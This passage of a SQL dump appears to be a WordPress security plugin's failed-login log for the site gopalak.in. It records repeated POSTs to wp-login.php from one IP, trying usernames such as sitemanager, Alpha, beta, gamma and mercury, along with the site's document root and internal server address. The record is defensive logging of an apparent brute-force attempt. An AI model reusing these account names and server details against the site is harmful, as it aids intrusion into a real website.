23:44:41'),(94890,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62922\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746451366.6400199;s:12:\"REQUEST_TIME\";i:1746451366;}}','107.151.209.126',1,'2025-05-05 18:52:48','2025-05-06 23:44:41'),(94891,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62928\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746451366.6449659;s:12:\"REQUEST_TIME\";i:1746451366;}}','107.151.209.126',1,'2025-05-05 18:52:48','2025-05-06 23:44:41'),(94892,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62926\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746451366.6256721;s:12:\"REQUEST_TIME\";i:1746451366;}}','107.151.209.126',1,'2025-05-05 18:52:48','2025-05-06 23:44:41'),(94893,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62941\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746451366.650948;s:12:\"REQUEST_TIME\";i:1746451366;}}','107.151.209.126',1,'2025-05-05 18:52:48','2025-05-06 23:44:41'),(94894,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62925\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746451366.640753;s:12:\"REQUEST_TIME\";i:1746451366;}}','107.151.209.126',1,'2025-05-05 18:52:48','2025-05-06 23:44:41'),(94895,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56478\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746453515.6589949;s:12:\"REQUEST_TIME\";i:1746453515;}}','107.151.209.126',1,'2025-05-05 19:28:37','2025-05-06 23:44:41'),(94896,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56475\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746453515.652808;s:12:\"REQUEST_TIME\";i:1746453515;}}','107.151.209.126',1,'2025-05-05 19:28:37','2025-05-06 23:44:41'),(94897,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56484\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746453515.6614571;s:12:\"REQUEST_TIME\";i:1746453515;}}','107.151.209.126',1,'2025-05-05 19:28:37','2025-05-06 23:44:41'),(94898,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56474\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746453515.6483729;s:12:\"REQUEST_TIME\";i:1746453515;}}','107.151.209.126',1,'2025-05-05 19:28:37','2025-05-06 23:44:41'),(94899,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56469\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746453515.654453;s:12:\"REQUEST_TIME\";i:1746453515;}}','107.151.209.126',1,'2025-05-05 19:28:37','2025-05-06 23:44:41'),(94900,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746455641.117269;s:12:\"REQUEST_TIME\";i:1746455641;}}','107.151.209.126',1,'2025-05-05 20:04:02','2025-05-06 23:44:41'),(94901,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53488\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746455641.0949221;s:12:\"REQUEST_TIME\";i:1746455641;}}','107.151.209.126',1,'2025-05-05 20:04:02','2025-05-06 